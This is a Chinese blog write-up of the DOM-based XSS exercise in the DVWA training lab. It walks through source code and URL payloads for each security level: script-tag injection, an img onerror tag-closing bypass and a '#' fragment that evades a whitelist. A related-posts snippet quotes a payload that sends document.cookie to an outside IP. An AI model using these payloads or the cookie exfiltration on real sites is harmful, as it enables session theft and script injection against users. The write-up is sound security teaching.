一、详解 DVWA_DOM型XSS

最新推荐文章于 2024-02-04 09:45:26 发布
最新推荐文章于 2024-02-04 09:45:26 发布
阅读量1.6k 收藏 15
点赞数 5
分类专栏: # 第六篇 WEB 安全 网络安全基础篇 文章标签: xss web安全 前端 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44519789/article/details/124919038
版权

创建时间:2022年5月3日21:00:01
作者:在下小黄

  • 每个页面都有自己的DOM树,通过修改DOM树使得恶意脚本被执行。
  • DOMDocument Object Model文档对象模型,所以后面代码主要注重前端。

一、Low 级别:

  1. 我们拿到靶场之后发现有选择框,然后我选择English之后发现URL地址栏拼接了我们选择框的内容
  2. 打开源代码分析之后发现,服务端并没有任何的PHP代码,所以说执行判断的只有客户端的JavaScript代码。(非常符合DOM型XSS)

image.png

  1. 检查一下源代码:发现使用了很多 document 对象代表当前文档,使用window 对象的 document 属性访问。

image.png

  1. 使用 document 对象的 write()writeln()方法可以动态生成文档内容,包括以下两种方式:
  • 在浏览器解析时动态输出信息。
  • 在调用事件处理函数时使用 write() 或 writeln() 方法生成文档内容。
  1. write() 方法可以支持多个参数,当为它传递多个参数时,这些参数将被依次写入文档。
  • 前端将GET上传的default参数加入到<select>元素的选项卡中,每当页面被呈现时,恶意代码就可以运行。
  • 后端没有做任何防护,意思就是随便注。

document.location.href.indexOf(str)返回字符串str第一个字符的下标。
document.location.href.substring(start, end)构造下标从startend的子串。

  • 直接在URL中通过修改default参数上传XSS注入。
  1. 我们尝试一下看看插入一条XSS语句会有什么变化。<script>alert(1)</script>
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English
                                    |
                                    |
                                    |
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
  1. 可以看出我们成功了

image.png

  1. 检查一下源代码,看看注入恶意语句之后跟之前的变化

image.png

    <option value='变量lang 的值'>English<script>alert(/xss/);</script></option>

二、Medium 级别:

image.png

  1. 打开服务端源代码查看:
<?php
  
  // Is there any input?
  if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
      header ("location: ?default=English");
      exit;
    }
  }

?>
  • 前端代码没变(之后也应该不变),后端增加了对<script的过滤。
  • 这里可以使用没有被屏蔽的标签进行注入。
  1. 检查代码我们发现,在代码里面对

image.png

  1. 正常的value的值是从这个当中选出来的,那么我们可以通过构造闭合来执行我们的语呢?

  2. English替换成>/option></select><img src=1 onerror=alert(/xss/)></option>那么这个语句是怎么闭合的呢?

  3. 学过html语言的我们都知道<option></select>都是双标签,也就是说会识别两个标签之间的语句,那么我们就人为把它闭合起来,在执行过程中,一旦存在一对标签,那么就会执行这里面的语句,无法构成成对标签的不会执行里面的语句,而是单标签,也就是说他要执行的语句涵盖在它里面。通过构造闭合,我们成功执行xss。(简单来说就是构造语句闭合形成XSS)

  4. 简单来说:将<option><select>标签闭合,保证img标签可以插入。

</option></select><img src=1 onerror=alert(/xss/)>

image.png

三、High 级别:

  1. 首先我们打开源代码看一下,进行一下简单的代码审计,代码上写的是不需要做任何事情,全在客户端
<?php
  
  // Is there any input?
  if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    
    # White list the allowable languages ,白名单
    switch ($_GET['default']) {
      case "French":
      case "English":
      case "German":
      case "Spanish":
        # ok
        break;
      default:
        header ("location: ?default=English");
        exit;
    }
  }

?>
  • 白名单只允许传的 default 值 为 French、 English、 German、 Spanish 其中一个
  • 若不在白名单内,默认设置为English。
  1. 尝试构造攻击语句:
  • 使用&或者#分隔参数,$_GET['default']指向分隔符之前的内容,参与后端判断语句。
  • 根据前端代码可知,分隔符之后的内容也会载入到前端页面中,故可实现恶意代码的注入。
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English #<script>alert(/xss/)</script>

image.png

  1. 插入页面的实际效果:
 <option value=''>English #<script>alert(/xss/)</script></option>

image.png

  1. 由于 form表单提交的数据 想经过JS 过滤 所以注释部分的javascript 代码不会被传到服务器端(也就符合了白名单的要求)

四、Impossible 级别:

  1. 还是开头检查源代码,发现不需要做任何事,在客户端处理

image.png

  1. 当我们打开源代码之后。发现网页源码内容也同样发生了变化:

image.png

<form name="XSS" method="GET">
			<select name="default">
				<script>
					if (document.location.href.indexOf("default=") >= 0) {
						var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
						document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
						document.write("<option value='' disabled='disabled'>----</option>");
					}
					    
					document.write("<option value='English'>English</option>");
					document.write("<option value='French'>French</option>");
					document.write("<option value='Spanish'>Spanish</option>");
					document.write("<option value='German'>German</option>");
				</script>
			</select>
			<input type="submit" value="Select" />
		</form>
          
     ---------------------------------防御XSS-----------------------------------    
          
<select name="default">
    <script>
        if (document.location.href.indexOf("default=") >= 0) {
            var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
            document.write("<option value='" + lang + "'>" + (lang) + "</option>");
            document.write("<option value='' disabled='disabled'>----</option>");
        }

        document.write("<option value='English'>English</option>");
        document.write("<option value='French'>French</option>");
        document.write("<option value='Spanish'>Spanish</option>");
        document.write("<option value='German'>German</option>");
    </script>
    <option value="English">English</option>
    <option value="French">French</option>
    <option value="Spanish">Spanish</option>
    <option value="German">German</option>
</select>
  • 之前的恶意代码之所以能够运行就是因为在呈现页面元素时,将URL中已经编好码的参数使用decodeURI()解码,解码后的代码才可以执行。
  • 前端不解码直接呈现参数lang,导致恶意代码编码后无法被解析。
    ish German
```
  • 之前的恶意代码之所以能够运行就是因为在呈现页面元素时,将URL中已经编好码的参数使用decodeURI()解码,解码后的代码才可以执行。
  • 前端不解码直接呈现参数lang,导致恶意代码编码后无法被解析。
在下小黄
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DVWA系列之XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1421
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射、只决定于输出地方 在反射XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWA - XSS DOM (low)
qq_42630215的博客
06-04 395
low级别 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSSDOMXSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。 可能触发DOMXSS的属性:document.referer 属性wi
DVWAXSSDOM
RexHa的博客
10-06 2052
dvwa XSSDOM
DVWA系列Web常见漏洞XSS(DOM)源码分析及漏洞利用
weixin_57641619的博客
05-24 1735
本期主要讲解什么是基于DOMXSS漏洞,XSS(DOM)漏洞攻击实例,基于DOMXSS漏洞产生的原因以及一般会在何处产生,最后讲解如何利用基于DOMXSS漏洞(如XSS经典的窃取cookie等)。
[网络安全]DVWAXSS(DOM)攻击姿势及解题详析合集
热门推荐
等风来
05-16 1万+
源代码未进行任何过滤复选框中的内容为可变参数:这段 PHP 代码主要是用于处理 GET 请求中的 default 参数,它包含了以下几个功能: 1.判断是否有 default 参数:通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。 2.防止 XSS 攻击:使用 stripos() 函数查找 $default 中是否包含
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
DVWA_Tool.rar
02-13
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序的过程,并帮助学生和教师了解受控...
dvwa_owasp_zap_config
05-25
dvwa_owasp_zap_config
网络渗透测试平台_DVWA_201807
07-04
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWA的BruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
DVWA系列】十、XSS(DOM) 基于DOMXSS(源码分析&漏洞利用)
Pluto.的博客
03-12 1427
文章目录DVWAXSS(DOM) 基于DOM的跨站脚本攻击一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA XSS(DOM) 基于DOM的跨站脚本攻击 一、Low 级别 没有任何的安全保护措施 下拉框选择语言提交后,在url栏中的default参数直接显示: 构造XSS代码,修改参数,成功执行脚本: ?default=<script>alert('/xss/')</script> 查看网页源代码,脚本插入到代码中,所以执行了
DVWAXSSDOM
ANDTM的博客
06-08 314
DOM就是一个树状的模,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射的,也有可能是存储的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)
DVWA XSS DOM
m0_56107268的博客
04-30 1025
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
DVWA系列——XSS(跨站脚本注入(反射,储存DOM))
weixin_49340699的博客
12-15 2222
DVWA系列——XSS(跨站脚本注入)简介low级别反射xss源码分析储存xss源码分析DOMxss源码分析medium级别反射xss源码分析破解思路储存xssDOMxss源码分析high级别反射xss储存xssDOMxss 简介 XSS全称Cross Site Scripting,即跨站脚本攻击,从某种意义上来说也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面,恶意代码就会在浏览器页面执行,xss不限于javascript,还包括flash等其他脚本语言,根据代
DVWA学习之XSS(跨站脚本攻击)
最新发布
mmxhappy的专栏
02-04 981
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击!
通过DVWA学习DOMXSS
Mi1k7ea
01-02 4052
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞,其触...
DOMXSS
qq_45300786的博客
08-20 4152
可以通过document来获取有些信息。
DVWA--XSS (DOM)
When you collect everything, you understand nothing.
09-09 386
0x00简介 DOM XSS漏洞是基于文档对象模(Document Object Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。 DOM中有很多对象,其中一些是用户可以操纵的,如url、location、refere等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不...
玩转DVWAXSS DOM
key01362000的博客
09-29 1069
DVWAXSS DOM攻击
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

在下小黄

ღ给个赞 是对小黄最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值